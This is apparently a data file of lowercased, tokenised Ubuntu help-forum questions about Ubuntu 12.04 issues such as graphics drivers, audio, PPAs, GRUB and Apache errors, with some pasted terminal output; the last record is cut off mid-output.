185488	how can i get the best performance for playing games ?	i 've been playing a couple of wine-games today and decided to switch to metacity to see what the performance difference was like . if you 've never done it before , you just run metacity -- replace but do n't do that if you use unity ! anyway , surprise surprise it was like playing on a dedicated windows gaming machine . playing under metacity today was bliss . much higher framerates and just a fluidity that you 'd expect from a native game . i 'm not sure i can go back . switching to metacity is no hardship but i wonder if there 's anything else in the wm landscape that i should try out . i 'm essentially looking for suggestions for the best way to play games . mix up wms , dedicated x sessions , whatever ... as long as it makes wine games run faster . small print one process per answer ( eg : new x session + openbox ) we should probably land on a benchmark so we can show percentage improvement over a stock compiz desktop . i 'm open to suggestions in the comments . if people could test it and submit their how much it improves things for them in the comments , that would give others a good idea of if it 's worth the pain .
185489	ubuntu live cd installation hangs after typing username and password	i have a vaio vgn-fj270p/b laptop which originally installed a windows xp professional in it . last week , i had enough about the speed of windows and bought a brand new fresh ssd [ m5s 128gb ] and 2 new rams [ 1gb x2 ] . and i used my desktop to install a live usb and downloaded the latest ubuntu and installed it [ universal usb installer + ubuntu 12.04.1 ] . all seems fine through partition and typing my username and password . just after i typed in my password , i pressed continue and then it pop-up the window about choosing the profile picture for my account and it immediately disappear and did nothing . what 's happening with it ? any help would be appreciated .
185490	how to play wmv files ?	i tried playing a wmv file in vlc and it told me something along the lines of unable to play wmv3 files . unfortunately there is no way for you to fix this . when i try to open the same file in mplayer , it tells me an internal data stream error occurred . i finally got it to start playing in kplayer , but it is really sketchy ; it 's black and white and there 's a few random blue lines down the middle of the video . so is there any support for wmv3 files ? p.s . the same wmv file plays fine on my pc . a different wmv file plays on ubuntu fine .
185491	no unity updates in ubuntu 12.10	so , yesterday i 've updated my ubuntu ( 12.04 - > 12.10 ) to report bugs and to meet the new unity . after the update the unity looks the same : no `` unity previews '' or any news . so , i went to the terminal to see the unity version that was installed : wlcosta @ glados : ~ $ unity -- version unity 6.2.0 any ideas about the problem ?
185495	how can i use ruby with quickly ?	recently i came across quickly . a very nice thing ubuntu is doing in order to simplify creation of good looking applications that integrates well with ubuntu desktop in every respect . while the demo was so cool and even motived me to learn python , i am only familiar with ruby . i would really love if there is a way to make quickly do similar thing with ruby . i read something about templates ; but could n't locate much details .
185497	how to open a file on nautilus file dialog through http url ?	it 's available on windows . for example , when a browser file input ask you to select a file from your computer , you can type a url as a location . and it 's going to be downloaded as a temporary file and be selected for input . can we do that on ubuntu ?
185501	'w : failed to fetch ' warning during updates	i get some error messages as soon as i try to install or update packages : w : failed to fetch http : //fr.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-en_us something wicked happened resolving 'fr.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //fr.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-en something wicked happened resolving 'fr.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) e : some index files failed to download . they have been ignored , or old ones used instead . i tried to find something by googling but i did n't find any satisfactory response . anybody has an idea ?
185502	screen resolution `` out of range ''	i 'm fairly new to ubuntu and have just installed ubuntu server 12.04 on a spare machine to experiment and play with ! the installation went without problem , however , whenever the os boots the monitor displays an error message saying the resolution is out of range and i ca n't see to do anything - i can wait as long as i like , but nothing appears . ubuntu is the only os installed so bypasses grub on boot , although the grub screen is also out of range if forced on startup . i can access a shell from the recovery mode and i can get at a terminal through a live cd of the desktop version but have had little luck with it either . i 've been trying to figure this out for days and i 'm at a total loss . any thoughts ?
185506	how may i know if my devices have their drivers installed ?	i have a dell n4110 laptop , and i want to know if the drivers are installed and working well . for example , with my touchpad , in windows it has multi-touch gestures , so that i can scroll or zoom with two fingers ( like an ipod ) . however in ubuntu , only the right side works as a scroll bar . so maybe one driver is installed , but i need other one that uses my devices well , and the graphics card , i have no idea if it is well installed or not . i have an intel 3000hd graphics card . is there something like the device manager in windows , or another way to know if a device is driverless or if the device might have a better driver ?
185507	ubuntu 12.04 dual screen - live version ok but does not work after installation	i have a desktop machine , a bit old intel core 2 4400 ( 64bit ) , with nvidia geforce 7900 , two iiyamas , one 2403 , one 2202 . the problem is that everything works fine under live version -- the display applet sees both monitors and is able to recognise them and sets the resolution properly . then after installation the display applet can not recognise the configuration anymore -- it says it is a single 'laptop ' display with screen resolution up to 1280x768 or something . deleting the xorg.conf helps only a little -- one can set the proper 1920x1200 resolution , but that 's all -- 'display ' applet still see only the single 'laptop ' display . i 'd like to copy the live version configuration but i am not aware how to find out the differences between both configurations -- my question is how to check which package is installed and how to check where to find its config files to copy ?
185515	disable network configuration services during boot time	i have installed ubuntu 12.04 after booting it taking more time for network configuration.this happen before login . how to disable this services , could you please help us .
185516	problem with using remote desktop application via citrix web client	i have problem when i connect to remote desktop ( windows vdi ) via citrix application from web , it look like that mouse hot spot is shifted to upper position then i ca n't click on the correct button or menu items , when i 'd like to click to title bar i always get at gnome bar which is not my intention . in my understanding it might be from position mapping between gnome and remote desktop may not fit together . am i correct ? should it be considered as bug for gnome or citrix side ? do you guy have some experience the similar problem , is there any solution ? my ubuntu is 12.04 and my citrix client is 12.1 .
185520	how do i set preferences for the guake terminal ?	just installed guake - terminal emulator . how can i get to preferences to customize it ? i do n't seem to have any if the normal menu 's available . i searched everything on their help site to no avail . i use ubuntu 11
185521	ubuntu cloud setup without formating node hdd	is it possible to setup a master + 2 node ubuntu cloud without installing anything to the nodes ( booting them over network ) ?
185522	how to configure 5.1 audio system for realtek alc861 sound card in ubuntu 12.04 ?	i have already installed gnome alsa mixer on ubuntu . i did set all the parameters correctly . in hardware settings , in the `` choose a device to configure '' section , it appeared as `` built in audio - 1 output / 1 input - analog surround 5.1 output + analog stereo input '' because i 've selected that `` analog surround 5.1 output + analog stereo input '' as the profile . so the setting may be ok i think . but it only activates 3 channels in my audio system . front left , right and the sub woofer . other channels do n't work well . here is the alsa mixer in terminal , i can '' t volume up those channel from there . please give me simple and clear solution for to get this right . guys please help me .
185523	laptop turns off upon high cpu usage with very busy fan noise	my serval laptop ( vendor 's , system76 's , website no longer has info ) has suddenly started immediate turn-off power recently . it 's happened at least twice in last 2 days . any idea is appreciated and please tell me which log files you need to investigate so that i 'm happy to provide those . i can only describe the situation non-numerically b/c i did n't record anything when it occurred but : cpu usage is high due to the app i started ( roughly , the usage of all 4 cores is more than 75 % , less than 100 % on gnome system monitor ) application program running was a simulator for robotics ( called gazebo ) , which after a few minutes of running the phenomenon occurs . i 've used the same tool before on this machine so should n't be the matter . noise of the fan was the one of the busiest memory usage was about 50 % not sure if it 's related but after i 've upgraded to precise , the fan has been making more noise even when the cpu usage is very low . environment : ubuntu 12.04 ( originally 11.04 upon purchase , then 11.10 ) , kernel 3.2.0-30-generic , core i7 2ghz x 8 , 11.7gb ram , geforce gtx 560m thanks .
185526	ca n't restart apache due to invalid 'echo ' command	when i enter command admin @ ubuntu : ~ $ sudo /etc/init.d/apache2 restart [ sudo ] password for admin : i get this msg syntax error on line 3 of /etc/apache2/conf.d/fqdn : invalid command 'echo ' , perhaps misspelled or defined by a module not included in the server configuration action 'configtest ' failed . the apache error log may have more information . ... fail ! please tell me how i restart my apache2 server ...
185530	bootable dvd installs ubuntu in one computer but not in other ... why ?	i have 2 computers , windows 7 intel . on one computer ubuntu boot-able dvd ( amd 64 ) works properly . but on other computer the same dvd boots ok but when clicked on `` install ubuntu '' a blank screen with blinking cursor ( _ ) appears and it continues just blinking forever . what problem can be there in computer 2 ? can it be dvd reader 's problem ? ( both computers have lg dvd rw ) can there be any problem in dvd ? computer 1 specs : pentium d 3 ghz windows 7 32-bit not a 64bit-capable processor still ubuntu 64bit trial/installer runs ... computer 2 specs : core i7 2700k windows 7 32-bit nvidia gtx 560 graphicscard ... big boss ... still ca n't run the setup/trial/disk-check/memory-test ? ! ? ! ? is it the problem of graphics card ? ! ? i also tried burning other dvd which has the same behavour ... . and yes the dvd name is : ubuntu-12.04.1-dvd-amd64.iso any help is appreciated .
185533	how do i zoom in one window in unity	i 'm trying to zoom in ( or scale up ) one window on the macbook pro with hidpi/retina screen in unity on 12.04 . this is useful for some applications that does n't allow the font size etc . to be changed . it would also be useful to e.g . scale up virtualbox on hi-res screens . the compiz zoom plugin zooms the entire desktop , so that 's not what i need . the shelf plugin does what i want , but only scales windows down . thanks for any help !
185534	is the update for a point release automatic or should i download and install ?	through `` system settings '' > `` details '' , it says ubuntu 12.04 . i saw that a new version of 12.04-12.04.1-have been released . have `` update manager '' already update/upgrade my version ? or should i download and install ? thanks for your answers . edit : terminal : ubuntu @ candycandoit : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.1 lts release : 12.04 codename : precise ubuntu @ candycandoit : ~ $ '' details '' in `` system settings '' : just uploading : 2 ) 3 ) 4 )
185540	installing server packages ( how to edit protected files )	i 'm a new convert to linux and am building a new server using ubuntu 12.04 ( home network , server will be file storage and will run php/mysql for my web development projects ) . i am really struggling . the first thing i thought i 'd try is to install samba so i could share the file directories on my network , but when i try to edit the config file to name the shared directory , it says i ca n't save it as i 'm not the owner . looking at the permissions also tells me i 'm not the owner ( who is ? ) . i 've googled for hours and tried various suggestions , none seem to work . help ?
185542	does the ipod shuffle 4th gen work well with rhythmbox ?	i 'm thinking about getting an ipod shuffle 4th gen. , but if it does n't work well with ubuntu 12.04/rhythmbox it 's a no-go . does anyone have any experiences with this combination ? thank you in advance .
185543	has anyone tried the lenovo usb 3.0 dock on ubuntu ?	i 'm thinking on buying the lenovo usb 3.0 dock and use it with ubuntu and unity , but i have n't found information regarding if ubuntu already has built-in drivers for it . the link to this product is this one : http : //shop.lenovo.com/seuilibrary/controller/e/web/lenovoportal/en_us/catalog.workflow : item.detail ? groupid=460 & code=0a33970 # overview so , i 'd just like to know if its a good idea getting it or i 'd better not because i might have a difficult time trying to set it up . thanks .
185548	open-source driver for amd radeon hd 6490m	i have hp probook 4530s laptop with amd radeon hd 6490m graphics card . after installing ubuntu it runs on intel sandybridge graphics . the ubuntu community page says : `` by default ubuntu will use the open source ati or radeon driver for cards manufactured by amd/ati . '' i already have installed the required driver packages : xserver-xorg-video-ati xserver-xorg-video-radeon xserver-xorg-video-vesa xserver-xorg-video-intel xserver-xorg-video-all , but it uses intel driver anyway . when i 'm uninstalling the intel driver ( xserver-xorg-video-intel ) and rebooting , radeon graphics works , it uses gallium driver , but only 2d session loads . this page says : `` no configuration is necessary for ati driver in the modern versions of ubuntu . '' and i 'm using ubuntu 12.04 . what 's wrong ? please help ! ! i got tired ! ! ! p.s . i do n't want the proprietary fglrx driver ! it 's really buggy on my system ! ! ! thanks ! : )
185558	will someone compile and setup a ppa for diaspora shattered armistice ?	not a but , just a suggestion . there 's been a lot of talking about gaming in linux the last weeks . a couple days ago this game was released for windows , mac and linux . the linux version have to be compiled from source which is quite easy but newbie users like me find difficult . if you have a look at the website they say they do n't have the time nor expertise to make linux builds but they expect each distro do their own so my question is , is anybody going to build .deb packages ? the game is really amazing , it beats most of the commercial games you can find in the repositories , even expensive ones . it 's still crashing sometimes but it 's the first release so it may be considered a beta but it could move a lot of people to switch to ubuntu . more information here : http : //www.hard-light.net/forums/index.php ? topic=81859.0
185559	empathy `` authentication failed '' when connecting to freenode	i have set up an irc account in empathy - the default server is , of course , freenode . empathy tries to connect and after a few moments reports , `` authentication failed '' . i have tried with and without a password ( my nickname is registered with freenode. ) . what could i possibly be doing wrong ? update : i was able to connect when on another network . could the problem be with my verizon mobile broadband ?
185560	can not log into ubuntu 12.04.1 lts after startup	i recently installed 64bit ubuntu 12.04.1 lts on my inspiron 1720 laptop as a dual-boot with windows 7 . when i boot up ubuntu , it gets to the log in screen just fine but after logging in it gets stuck with the default desktop background display only . i can move the cursor around but i ca n't get any response from it . no response from any keyboard commands or from any clicking and i eventually have to force it off . i can log in recovery mode just fine without any issue so i 've updated ubuntu in recovery mode but i still have the same issue .
185561	i have to `` stab '' at the upper left corner to get launcher to appear	running 12.04 lts . this is extremely annoying and makes me want to try another flavor of linux . yes , this little inconvenience is that annoying to me . most of the time the launcher will appear nice and easy as soon as i mouse over the upper left corner , but many times , the left edge of the screen will get a little darker , but the launcher will not appear . by seeing the edge darken , i know that the os is acknowledging my mouse 's presence in the corner . only by `` stabbing '' the corner with my mouse can i get it to appear . i just want the launcher to appear as soon as i mouse over the corner . any help would be great .
185567	why am i not able to add any ppa repositories ?	karan @ karan-hp-630-notebook-pc : ~ $ sudo add-apt-repository ppa : danielrichter2007/grub-customizer you are about to add the following ppa to your system : this ppa contains the latest release of grub customizer . more info : https : //launchpad.net/~danielrichter2007/+archive/grub-customizer press [ enter ] to continue or ctrl-c to cancel adding it traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 177 , in < module > if not sp.add_source_from_line ( line ) : file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 718 , in add_source_from_line self.set_modified_sourceslist ( ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 471 , in set_modified_sourceslist self.save_sourceslist ( ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 635 , in save_sourceslist self.sourceslist.save ( ) file `` /usr/lib/python2.7/dist-packages/aptsources/sourceslist.py '' , line 396 , in save files [ source.file ] = open ( source.file , `` w '' ) ioerror : [ errno 2 ] no such file or directory : u'/etc/apt/sources.list.d//danielrichter2007-grub-customizer-precise.list' executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.ags8vrsgrk -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver hkp : //keyserver.ubuntu.com:80/ -- recv 59dad276b942642b1bbd0eaca8aa1faa3f055c03 gpg : requesting key 3f055c03 from hkp server keyserver.ubuntu.com gpg : key 3f055c03 : `` launchpad ppa for daniel richter '' not changed gpg : total number processed : 1 gpg : unchanged : 1
185569	installing datacommons from sunlight	i know strictly nothing from python and i am installing datacommons from the sunlightlabs . so i followed step by step the readme.md https : //github.com/sunlightlabs/datacommons first , it is said in the doc to add to the virtualenv dc_data , dc_matcchbox but i did n't find them . but i went to the final step to run ./manage.py runserver so i had the following message : ( datacommons ) newben @ newben-virtualbox : ~/share-ubuntu/sunlightlabs-datacommons-e3ff1a3 $ ./manage.py runserver fatal : not a git repository ( or any parent up to mount parent /home/mbenchoufi ) stopping at filesystem boundary ( git_discovery_across_filesystem not set ) . error : ca n't find the file 'settings.py ' in the directory containing './manage.py ' . it appears you 've customized things . you 'll have to run django-admin.py , passing it your settings module . ( if the file settings.py does indeed exist , it 's causing an importerror somehow . ) in the 'sunlightlabs-datacommons-e3ff1a3 ' folder , i downloaded and put the files from github . by the way i didi n't understand how to deal with the settings file . could someone help me understand how to install datacommons ?
185573	hardware compatibility of dell inspiron 15r for 12.04.1	first of all , i am not a geek and i am totally new to linux . i want to try 12.04.1 lts on my dell inspiron 15r laptop . i want to know whether the hardware of the laptop is compatible with ubuntu and they 'll just work with ubuntu as fine as they work with windows 7 . following are my hardware specs as i found . can anyone tell me , will they work fine and the machine will run smoothly ? ram : 8.00 gb ddr3-sdram ( 1333 mhz ) processor : intel ( r ) core ( tm ) i7-2670qm cpu @ 2.20ghz optical drive â hitachi hl-dt-st dvd+-rw gt60n mother board : manufacturer dell inc. ( product 0hvrtt ) chipset : intel pch hm67 network card - realtek pcie fe family controller network card - dell wireless 1701 802.11b/g/n bluetooth port - dell wireless 1701 bluetooth v3.0+hs video card 1- intel ( r ) hd graphics family video card 2- geforce gt 525m ( geforce gt 525m ) sound card - idt high definition audio codec laptop_integrated_webcam_hd
185574	free urw postscript fonts versus truetype	ubuntu includes the free commercial urw++ postscript fonts in /usr/share/fonts/type1/gsfonts ( from the gsfonts package ) . i 've seen that the full set are also available in truetype format ( including several not in gsfonts , such as garamond ) . if you download the ghostscript source , they 're all there . is there any benefit to using the truetype versions instead ? will the display improve ? will it affect printing ?
185578	using proxy on my ubuntu 12.04 and proxy exception problem	i 'm new to linux systems . i recently installed 12.04 lts and it works fine , but i have a problem . i live in the university dorms and in order to use internet , i have to put proxy settings which require authentication . i had a problem with downloading from the store but i read the solution you wrote here still sometimes it works . i do n't know why . but the big problem is , if i want to open any link from inside the university , i have to disable the proxy , on windows there were an exception for using the proxy you can easily do it . is there any possible way of doing that in ubuntu 12.04 ?
185579	grub menu wo n't show after installation ( two-disk )	i downloaded the ubuntu 12.04 64bit and installed it on a 115gb partition next to a 15gb swap alongside windows 7 . i 'm using a asus g73s . i have 2 drives : one with only windows ( 500gb ) and another with a partition for ( 250gb ) windows and ( 115gbb ) the ubuntu and ( 15gb ) swap partitions . but after the installation , i ca n't find out how to run ubuntu . it just run windows . i read that it should show a grub menu . i tried : holding both shift keys at boot up . running the ubuntu live cd and edit the grub file . also pressing the esc and some function button during boot . nothing seems to work . i solved my problem . i pressed esc during boot and a boot menu opened and there i choosed option : p2 and than the grub menu showed .
185580	directory permissions adding user in a group	i added a user using useradd useradd -g upperdevs myuser but when i do an id check i did n't see the upperdevs group . id myuser # uid=1000 ( myuser ) gid=1000 ( myuser ) groups=1000 ( myuser ) ,27 ( sudo ) probably this was the issue why i ca n't write to certain_dir , by doing ls -l : drwxrwxr-x 2 root upperdevs 4096 sep 8 13:35 certain_dir anything i 'm doing wrong ?
185583	problem with reformatting sandisk read-only usb drive	i have a problem reformatting my usb drive . its showing this error message whenever i try to reformat it using gparted : parted 0.11.0 -- enable-libparted-dmraid libparted 2.3 format /dev/sdb1 as ntfs 00:00:01 ( error ) calibrate /dev/sdb1 00:00:01 ( success ) path : /dev/sdb1 start : 22,768 end : 31,248,383 size : 31,225,616 ( 14.89 gib ) set partition type on /dev/sdb1 00:00:00 ( error ) libparted messages ( info ) unable to open /dev/sdb read-write ( read-only file system ) . /dev/sdb has been opened read-only . unable to open /dev/sdb read-write ( read-only file system ) . /dev/sdb has been opened read-only . unable to open /dev/sdb read-write ( read-only file system ) . /dev/sdb has been opened read-only . unable to open /dev/sdb read-write ( read-only file system ) . /dev/sdb has been opened read-only . unable to open /dev/sdb read-write ( read-only file system ) . /dev/sdb has been opened read-only . unable to open /dev/sdb read-write ( read-only file system ) . /dev/sdb has been opened read-only . unable to open /dev/sdb read-write ( read-only file system ) . /dev/sdb has been opened read-only . unable to open /dev/sdb read-write ( read-only file system ) . /dev/sdb has been opened read-only . ca n't write to /dev/sdb , because it is opened read-only . unable to open /dev/sdb read-write ( read-only file system ) . /dev/sdb has been opened read-only . reason i wanted to reformat it , is because it just suddenly stopped working when i was transferring files from my pc and also it erased every content that was saved in the usb drive . i tried various tutorials on the internet regarding this , however , i ca n't find a solution on how to make a usb drive change its read-only property to read-write or anything that would enable me to reformat this usb drive . i have also checked this link format read-only usb drive but this one does n't have a solution . also am attempting to do this on ubuntu 12.04 .
185586	is there more risk of malware when using wubi ?	what would happen when i got a malware in my windows file system , or everywhere else . is it affect on the ubuntu os ? can i get a virus or any malware as i use ubuntu , and it may affect on the windows os ? for example , if i got a spyware on the window os , when i will use the ubuntu , is it will continue spy on me ?
185587	why does dvd playback still not work after installing libdvdcss2 ?	i have installed libdvdcss2 , but i still get this error when trying to play dvds : libdvdread4 was installed by default ( this is a new system76 pangolin performance ) . i ran the install-css.sh script , and it completed with no problems . i can confirm that libdvdread4 and libdvdcss2 are installed : mac9416 @ charlotte : ~ $ dpkg -l | grep dvdcss ii libdvdcss2 1.2.12-0.0medibuntu1 simple foundation for reading dvds - runtime libraries mac9416 @ charlotte : ~ $ dpkg -l | grep dvdread ii libdvdread4 4.2.0-1ubuntu3 library for reading dvds
185591	does ubuntu run well on an usb hdd ?	i have here a company notebook , and because the hdd is full encrypted , i can not install an extra partition for another system that i would like to use in my free time . and i really need another system , because this crap windows here with that much of anti-virus , anti-spyware , anti-whatever on it is so slow and annoying . what can i do ? i could use an external usb hdd with another system . because i would like to handle big files and so on , i do n't want to use a usb stick . a usb 2.5 hdd + ubuntu is what i think the best option . here are my questions : do i have to note something ? does ubuntu run well on an external hdd ? do i have big performance problems ( because of the usb hdd ) ? should i buy a very fast hdd for much money or it is not that important ? any suggestions ?
185592	strange display language in gnome shell	i logged in gnome-shell , and found that the display language is set to some strange asian language ( i think ) without my prompt . i tried to change the locale settings but found that the default language is english ( how ? ) despite of that strange language . here 's a snapshot , see the strange word instead of `` activity '' : i 'm on ubuntu 12.04 lts . output of locale : lang=zh_cn.utf-8 language=zh_cn : en_us : en lc_ctype= '' zh_cn.utf-8 '' lc_numeric=en_us.utf-8 lc_time=en_us.utf-8 lc_collate= '' zh_cn.utf-8 '' lc_monetary=en_us.utf-8 lc_messages= '' zh_cn.utf-8 '' lc_paper=en_us.utf-8 lc_name=en_us.utf-8 lc_address=en_us.utf-8 lc_telephone=en_us.utf-8 lc_measurement=en_us.utf-8 lc_identification=en_us.utf-8 lc_all= output of locale -a : c c.utf-8 de_ch.utf8 en_ag en_ag.utf8 en_au.utf8 en_bw.utf8 en_ca.utf8 en_dk.utf8 en_gb.utf8 en_ie.utf8 en_in en_in.utf8 en_ng en_ng.utf8 en_nz.utf8 en_ph.utf8 en_sg.utf8 en_us.utf8 en_za.utf8 en_zm en_zm.utf8 en_zw.utf8 posix zh_cn.utf8 zh_sg.utf8 solved : this answer did it .
185594	microphone not capturing sound on 12.04 lenovo g580	in both skype and the sound recorder application , i am not capturing any audio from my built-in microphone . i 'm not sure why . otherwise , sound output is working well . i have tried running gstreamer-properties and setting the default input plugin to pulseaudio as well ( to match the output ) , and it did n't help . i have tried running alsamixer -v all and i only get 2 input-related entries : capture ( l r ) which is on 100 and not muted ( ca n't be either ) , and analog mic boost which is on 20db . extra info : camera ( video ) is working well on skype and kamerka . can you please help me get my microphone to work ? lspci : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) subsystem : lenovo device 3977 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort+ > serr- < perr- intx- latency : 0 capabilities : < access denied > kernel driver in use : agpgart-intel 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo device 3977 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 42 region 0 : memory at e0000000 ( 64-bit , non-prefetchable ) [ size=4m ] region 2 : memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] region 4 : i/o ports at 3000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : lenovo device 3977 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 41 region 0 : memory at e0600000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) subsystem : lenovo device 3977 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 43 region 0 : memory at e0614000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : lenovo device 3977 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 16 region 0 : memory at e0619000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) subsystem : lenovo device 3977 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 44 region 0 : memory at e0610000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : e0500000-e05fffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 memory behind bridge : e0400000-e04fffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : lenovo device 3977 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 23 region 0 : memory at e0618000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) subsystem : lenovo device 3977 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 capabilities : < access denied > kernel modules : itco_wdt 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : lenovo device 3977 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz+ udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin b routed to irq 40 region 0 : i/o ports at 3088 [ size=8 ] region 1 : i/o ports at 3094 [ size=4 ] region 2 : i/o ports at 3080 [ size=8 ] region 3 : i/o ports at 3090 [ size=4 ] region 4 : i/o ports at 3060 [ size=32 ] region 5 : memory at e0617000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) subsystem : lenovo device 3977 control : i/o+ mem+ busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- interrupt : pin c routed to irq 10 region 0 : memory at e0615000 ( 64-bit , non-prefetchable ) [ size=256 ] region 4 : i/o ports at 3040 [ size=32 ] kernel modules : i2c-i801 01:00.0 ethernet controller : atheros communications inc. ar8162 fast ethernet ( rev 08 ) subsystem : lenovo device 3979 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 11 region 0 : memory at e0500000 ( 64-bit , non-prefetchable ) [ size=256k ] region 2 : i/o ports at 2000 [ size=128 ] capabilities : < access denied > 02:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) subsystem : lenovo device 31a1 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 17 region 0 : memory at e0400000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : ath9k kernel modules : ath9k aplay -l **** 